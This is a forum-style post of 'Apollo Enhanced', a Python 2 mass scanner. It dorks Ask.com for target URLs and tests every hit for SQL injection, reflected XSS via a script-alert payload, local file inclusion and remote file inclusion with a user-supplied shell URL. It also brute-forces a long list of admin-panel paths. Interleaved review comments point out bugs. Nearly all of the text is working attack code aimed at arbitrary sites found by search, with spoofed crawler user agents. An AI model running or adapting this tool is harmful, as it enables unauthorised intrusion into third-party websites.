Posted By

madfedora on 07/24/13



Apollo Enhanced



URL: https://github.com/SotdCode

This is a fork of the original “Apollo” Python Vulnerability Scanner project by Sotd. This fork has substantially enhanced SQL and XSS dorking functions. Please do not rip off either my code or Sotd's, because if you do, KITTENS WILL DIE! Ahem…

  1. #!/usr/bin/env python
  2. """
  3. Apollo.py - Python Vulnerability Scanner V1 -
  4. Written by Sotd - twitter.com/#!/Sotd_
  5.  
  6. Modified and fixed by madfedora
  7. [email protected]
  8. """
  9. import re
  10. import hashlib
  11. import Queue
  12. from random import choice
  13. import threading
  14. import time
  15. import urllib2
  16. import sys
  17. import socket
  18.  
# Fixed pool of browser / crawler User-Agent strings. Every request below
# picks one at random with random.choice(USER_AGENT); the pool is static
# and dated (2009-2011 era browsers).
USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
    "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
    "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sl-SI) AppleWebKit/533.24.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.24.1",
    "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/531.13.6",
    "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1)"
]
# Menu selection read by Crawl.crawler() to pick the worker class:
# '1' ScanClass (SQL errors), '2' XScanClass (XSS), '3' LScanClass (LFI),
# '4' RScanClass (RFI). It is assigned by code outside this excerpt; the
# default single space matches no branch, so nothing is scanned.
option = ' '
# Module-level tallies. Worker threads update them with `+=` under
# `global` declarations and no lock, so with ten concurrent workers the
# final counts are not guaranteed to be exact.
vuln = 0      # responses that matched an error / reflection signature
invuln = 0    # requests that completed with no signature match
np = 0        # queued URLs skipped because they contain no '='
# URLs that answered without a urllib2.URLError in the admin-page scan;
# appended by Atest.run() and printed by aprint().
found = []
  35.  
class Crawl:
    """Searches for dorks and grabs results"""
    # NOTE(review): the source page dropped all indentation; the nesting in
    # this class is reconstructed from Python statement semantics -- confirm
    # against the original file.
    def __init__(self):
        # Interactive setup. With option '4' (RFI) the operator also types
        # the remote file URL that RScanClass appends to every target.
        if option == '4':
            self.shell = str(raw_input('Shell Location: '))
        self.dork = raw_input('Enter your dork: ')
        self.queue = Queue.Queue()
        # The prompt says "Max 80" but nothing enforces it; a non-numeric
        # answer raises ValueError at int() in crawler().
        self.pages = raw_input('How many pages (Max 80): ')
        self.qdork = urllib2.quote(self.dork)
        self.page = 1
        # Constructing a Crawl object starts the crawl immediately.
        self.crawler()

    def crawler(self):
        """Crawler"""
        # Fetches result pages from us.ask.com and scrapes links out of the
        # HTML with fixed string markers ('_t" href' ... ' onmousedown="return pk'),
        # so a change in the search page's markup makes numlinks 0 and the
        # queue stays empty. urlopen() has no timeout and no exception
        # handling here: one failed fetch aborts the whole crawl.
        print '\nDorking...'
        for i in range(int(self.pages)):
            host = "http://us.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
            req = urllib2.Request(host)
            req.add_header('User-Agent', choice(USER_AGENT))
            response = urllib2.urlopen(req)
            source = response.read()
            start = 0
            count = 1
            end = len(source)
            numlinks = source.count('_t" href', start, end)

            # count starts at 1 and the loop runs while count < numlinks, so
            # at most numlinks - 1 links are taken from each page.
            while count < numlinks:
                start = source.find('_t" href', start, end)
                end = source.find(' onmousedown="return pk', start, end)
                # +10 skips the 8-char marker plus '="'; -1 drops the closing
                # quote; "amp;" is stripped to undo HTML entity escaping.
                link = source[start+10:end-1].replace("amp;","")
                self.queue.put(link)
                start = end
                end = len(source)
                count = count + 1
            self.page += 1

        # Dispatch on the module-level menu choice: ten daemon workers drain
        # the queue and join() returns once every item has had task_done().
        # If a worker dies without calling task_done(), join() blocks forever.
        if option == '1':
            for i in range(10):
                thread = ScanClass(self.queue)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()

        elif option == '3':
            for i in range(10):
                thread = LScanClass(self.queue)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()

        elif option == '2':
            for i in range(10):
                thread = XScanClass(self.queue)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()

        elif option == '4':
            for i in range(10):
                thread = RScanClass(self.queue, self.shell)
                thread.setDaemon(True)
                thread.start()
            self.queue.join()
  99.  
  100.  
class ScanClass(threading.Thread):
    """Scans for SQL errors and outputs to file"""
    # NOTE(review): indentation was lost on the source page; nesting below is
    # reconstructed -- confirm against the original file.
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.schar = "'"                  # probe appended verbatim to each URL
        self.file = 'sqli-result.txt'     # append-only result log

    def run(self):
        """Scans Url for Sql errors"""
        # Each queued URL that contains '=' is requested once with a single
        # quote appended, and the response body is checked against the
        # error-message signatures below.
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                test = site + self.schar

                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    # No timeout: a stalled server holds this worker indefinitely.
                    data = opener.open(conn).read()
                # Bare except also swallows KeyboardInterrupt / SystemExit, and
                # the failure is neither logged nor counted. task_done() is
                # called here and (if the trailing call is at loop level, as
                # reconstructed) again after the if/else, so every failed
                # request consumes two queue credits -- confirm nesting.
                except:
                    self.queue.task_done()
                else:
                    # Signature matching. Each string is a regex for re.findall,
                    # so '.' in 'oracle.jdbc.' / 'ADODB.Field' matches any
                    # character and the '()' in the Sybase patterns is an empty
                    # group, not literal parentheses. Only truthiness is used;
                    # re.search would answer the same without collecting every
                    # match. First matching branch wins.
                    #===========================================================#
                    # #
                    # MySQL #
                    # #
                    #===========================================================#
                    if (re.findall("You have an error in your SQL syntax", data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('Error:unknown', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('mysql_fetch', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('mysql_numrows', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('mysql_num', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('Invalid Query', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('FetchRow', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('GetArray', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('SELECT statements have a different number of columns', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('\' doesn\'t exist', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('Unexpected EOF found when reading file', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('Triggers can not be created on system tables', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # MsSQL #
                    # #
                    #===========================================================#
                    elif (re.findall('OLE DB Provider for SQL Server', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Unclosed quotation mark before the character string', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('All queries in a SQL statement containing a UNION', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Syntax error converting the varchar value', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('syntax near the keyword \'', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('String or binary data would be truncated', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Invalid object name \'', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Incorrect syntax near', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # Oracle #
                    # #
                    #===========================================================#
                    elif (re.findall('oracle.jdbc.', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('java.sql.sqlexception', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('SQL command not properly ended', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('quoted string not properly terminated', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('wrong number or types of arguments in call to', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('query block has incorrect number of result columns', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('expression must have same datatype as correspoding expression', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('ORA-01722:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('a non-numeric character was found where a numeric was expected', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('FROM keyword not found where expected', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('ORA-00936:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('ORA-00972:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('table or view does not exist', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('Invalid relational operator', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('missing right parenthesis', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('ORA-00900:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('ORA-03001:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('can only select from fixed tables/views', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # OLE DB #
                    # #
                    #===========================================================#
                    elif (re.findall('system.data.oledb', data, re.I)):
                        self.ole(test)
                        vuln += 1
                    elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
                        self.ole(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # ODBC #
                    # #
                    #===========================================================#
                    elif (re.findall('ODBC Microsoft Access Driver', data, re.I)):
                        self.odbc(test)
                        vuln += 1
                    elif (re.findall('ODBC Microsoft Server Driver', data, re.I)):
                        self.odbc(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # JET DB #
                    # #
                    #===========================================================#
                    elif (re.findall('JET Database Engine', data, re.I)):
                        self.jet(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # ADO DB #
                    # #
                    #===========================================================#
                    elif (re.findall('ADODB.Field', data, re.I)):
                        self.ado(test)
                        vuln += 1
                    elif (re.findall('ADODB.Command', data, re.I)):
                        self.ado(test)
                        vuln += 1
                    elif (re.findall('BOF or EOF', data, re.I)):
                        self.ado(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # PostgreSQL #
                    # #
                    #===========================================================#
                    # BUG: self.pgsql is not defined on this class -- the method
                    # below is named psql. Any PostgreSQL match raises
                    # AttributeError in the worker, which ends the thread before
                    # task_done() and leaves queue.join() in Crawl waiting.
                    elif (re.findall('postgresql.util', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('ERROR: invalid input syntax for integer', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('null_value_eliminated_in_set_function', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('dynamic_result_sets_returned', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall(': FATAL', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall(': could not connect to server', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # Sybase #
                    # #
                    #===========================================================#
                    elif (re.findall('Warning: sybase_query()', data, re.I)):
                        self.sybase(test)
                        vuln += 1
                    elif (re.findall('sybase_fetch_assoc()', data, re.I)):
                        self.sybase(test)
                        vuln += 1
                    #===========================================================#
                    # #
                    # Misc #
                    # #
                    #===========================================================#
                    elif (re.findall('query failed:', data, re.I)):
                        self.misc(test)
                        vuln += 1
                    else:
                        # B/W/R/G/O are colour codes not defined anywhere in this
                        # excerpt -- presumably set near the entry point; verify,
                        # otherwise this print raises NameError.
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()


    def mysql(self, url):
        """Outputs"""
        # Shared write-through pattern for all the output helpers below: the
        # whole result file is read back to detect duplicates, then the URL
        # is appended with a backend tag. The handle from open(...).read()
        # is never closed (relies on refcount GC), and the duplicate test is a
        # substring match, so a URL that is a prefix of an earlier one is
        # reported as [DUPE]. Concurrent workers append to the same file
        # without locking.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] '+W+url
        else:
            print O+"[MySQL] " + url+W
            write = open(self.file, "a+")
            write.write('[MySQL] ' + url + "\n")
            write.close()

    def mssql(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [MsSQL] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[MsSQL] " + url+W
            write = open (self.file, "a+")
            write.write('[MsSQL] ' + url + "\n")
            write.close()

    def oracle(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [Oracle] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[Oracle] " + url+W
            write = open (self.file, "a+")
            write.write('[Oracle] ' + url + "\n")
            write.close()

    def ole(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [OLE DB] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[OLE DB] " + url+W
            write = open (self.file, "a+")
            write.write('[OLE DB] ' + url + "\n")
            write.close()

    def odbc(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [ODBC] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[ODBC] " + url+W
            write = open (self.file, "a+")
            write.write('[ODBC] ' + url + "\n")
            write.close()

    def jet(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [JET DB] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[JET DB] " + url+W
            write = open (self.file, "a+")
            write.write('[JET DB] ' + url + "\n")
            write.close()

    def ado(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [ADO] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[ADO] " + url+W
            write = open (self.file, "a+")
            write.write('[ADO] ' + url + "\n")
            write.close()

    def psql(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [PGSQL] tag. NOTE: run()
        # calls self.pgsql, not self.psql, so this method is currently
        # unreachable.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[PGSQL] " + url+W
            write = open (self.file, "a+")
            write.write('[PGSQL] ' + url + "\n")
            write.close()

    def sybase(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [SYBASE] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[SYBASE] " + url+W
            write = open (self.file, "a+")
            write.write('[SYBASE] ' + url + "\n")
            write.close()

    def misc(self, url):
        """Outputs"""
        # Same write-through as mysql() with the [Misc] tag.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[Misc] " + url+W
            write = open (self.file, "a+")
            write.write('[Misc] ' + url + "\n")
            write.close()
  463.  
class LScanClass(threading.Thread):
    """Scans for Lfi errors and outputs to file"""
    # NOTE(review): indentation was lost on the source page; nesting below is
    # reconstructed -- confirm against the original file.
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.file = 'lfi-result.txt'   # append-only result log
        self.queue = queue
        self.lchar = '../'             # value substituted for the last parameter

    def run(self):
        """Checks Url for File Inclusion errors"""
        # The value of the URL's last '=' parameter is replaced by lchar and
        # the response is checked for a single PHP warning string. A page
        # that prints that warning for unrelated reasons is still counted.
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                # rsplit drops the last parameter value; lsite[-1] raises
                # IndexError when the URL starts with '=' (lsite is then '').
                lsite = site.rsplit('=', 1)[0]
                if lsite[-1] != "=":
                    lsite = lsite + "="
                test = lsite + self.lchar
                global vuln
                global invuln
                global np

                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    # No timeout; a stalled server holds this worker.
                    data = opener.open(conn).read()

                # Bare except swallows everything, unlogged; task_done() is
                # called here and again after the if/else (as reconstructed),
                # so a failed request consumes two queue credits -- confirm.
                except:
                    self.queue.task_done()

                else:
                    if (re.findall("failed to open stream: No such file or directory", data, re.I)):
                        self.lfi(test)
                        vuln += 1
                    else:
                        # B/W/R/G/O colour codes are not defined in this excerpt.
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()


    def lfi(self, url):
        """Outputs"""
        # Reads the whole log to detect duplicates (substring match; the read
        # handle is never closed), then appends the tagged URL.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[LFI] " + url+W
            write = open(self.file, "a+")
            write.write('[LFI] ' + url + "\n")
            write.close()
  520.  
  521.  
class XScanClass(threading.Thread):
    """Scan for Xss errors and outputs to file"""
    # NOTE(review): indentation was lost on the source page; nesting below is
    # reconstructed -- confirm against the original file.
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        # URL-encoded probe; '4p0ll0' is the marker run() looks for.
        self.xchar = """%3CScRIpT%3Ealert(%224p0ll0%22)%3C%2FScRiPt%3E"""
        self.file = 'xss-result.txt'   # append-only result log

    def run(self):
        """Checks Url for possible Xss"""
        # The last parameter value is replaced by xchar and the response is
        # searched for the marker text only. Output encoding of < > " does
        # not alter '4p0ll0', so a page that safely HTML-escapes the echoed
        # parameter is reported exactly like one that does not -- this is a
        # reflection check, not an XSS confirmation, and needs manual review.
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                # xsite[-1] raises IndexError when the URL starts with '='.
                xsite = site.rsplit('=', 1)[0]
                if xsite[-1] != "=":
                    xsite = xsite + "="
                test = xsite + self.xchar
                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    # No timeout; a stalled server holds this worker.
                    data = opener.open(conn).read()
                # Bare except swallows everything, unlogged; task_done() here
                # plus the trailing call (as reconstructed) double-counts.
                except:
                    self.queue.task_done()
                else:
                    if (re.findall("4p0ll0", data, re.I)):
                        self.xss(test)
                        vuln += 1
                    else:
                        # B/W/R/G/O colour codes are not defined in this excerpt.
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()

    def xss(self, url):
        """Outputs"""
        # Reads the whole log to detect duplicates (substring match; the read
        # handle is never closed), then appends the tagged URL.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[XSS] " + url+W
            write = open(self.file, "a+")
            write.write('[XSS] ' + url + "\n")
            write.close()
  574.  
  575.  
class RScanClass(threading.Thread):
    """Scans for Rfi errors and outputs to file"""
    # NOTE(review): indentation was lost on the source page; nesting below is
    # reconstructed -- confirm against the original file.
    def __init__(self, queue, shell):
        threading.Thread.__init__(self)
        self.queue = queue
        self.file = 'rfi-result.txt'   # append-only result log
        self.shell = shell             # operator-supplied URL from Crawl.__init__

    def run(self):
        """Checks Url for Remote File Inclusion vulnerability"""
        # The last parameter value is replaced by the operator-supplied URL
        # plus '?', and a hit is declared if the literal text 'uname -a'
        # appears anywhere in the response -- any page containing that string
        # for its own reasons is a false positive.
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                # rsite[-1] raises IndexError when the URL starts with '='.
                rsite = site.rsplit('=', 1)[0]
                if rsite[-1] != "=":
                    rsite = rsite + "="
                link = rsite + self.shell + '?'
                try:
                    conn = urllib2.Request(link)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    # No timeout; a stalled server holds this worker.
                    data = opener.open(conn).read()
                # Bare except swallows everything, unlogged; task_done() here
                # plus the trailing call (as reconstructed) double-counts.
                except:
                    self.queue.task_done()
                else:
                    if (re.findall('uname -a', data, re.I)):
                        self.rfi(link)
                        vuln += 1
                    else:
                        # B/W/R/G/O colour codes are not defined in this excerpt.
                        print B+link+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()

    def rfi(self, url):
        """Outputs"""
        # Reads the whole log to detect duplicates (substring match; the read
        # handle is never closed), then appends the tagged URL.
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[RFI] " + url+W
            write = open(self.file, "a+")
            write.write('[RFI] ' + url + "\n")
            write.close()
  628.  
  629.  
class Atest(threading.Thread):
    """Checks given site for Admin Pages"""
    # NOTE(review): indentation was lost on the source page; nesting below is
    # reconstructed -- confirm against the original file.
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        """Checks if Admin Page exists"""
        # A path counts as found whenever opener.open() returns without
        # urllib2.URLError. HTTPError is a URLError subclass, so 4xx/5xx
        # answers land in the except branch, but a host that returns 200 (or a
        # redirect) for unknown paths reports every entry. Any other exception
        # (socket errors, malformed URL) escapes the loop, ends the thread and
        # skips task_done(), so queue.join() in admin() never returns. No
        # timeout is set. `found` is a module-level list shared by 20 threads.
        while True:
            try:
                site = self.queue.get(False)

            except Queue.Empty:
                break
            try:
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
                print site
                found.append(site)
                self.queue.task_done()

            except urllib2.URLError:
                self.queue.task_done()
  655.  
  656.  
def admin():
    """Create queue and threads for admin page scans"""
    # Builds site + path for every entry of a fixed wordlist and lets 20 Atest
    # workers request them. The prompt relies on the operator to supply the
    # scheme and trailing slash; nothing validates the input. The list holds
    # duplicates (e.g. 'admin/', 'admin/account.php', 'admin2.php' appear more
    # than once), so those paths are requested repeatedly.
    # NOTE(review): indentation was lost on the source page and the list was
    # split mid-token at 'moderator/admin.php'; both are reconstructed here.
    print 'Need to include http:// and ending /\n'
    site = raw_input('Site: ')
    queue = Queue.Queue()
    dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/',
            'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php',
            'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html',
            'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php',
            'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp',
            'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html',
            'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
            'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
            'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
            'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
            'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
            'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
            'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
            'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
            'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
            'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
            'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
            'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
            'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx',
            'administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','administrador.php','administration.php','administrator.php',
            'admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html',
            'admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html',
            'administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/',
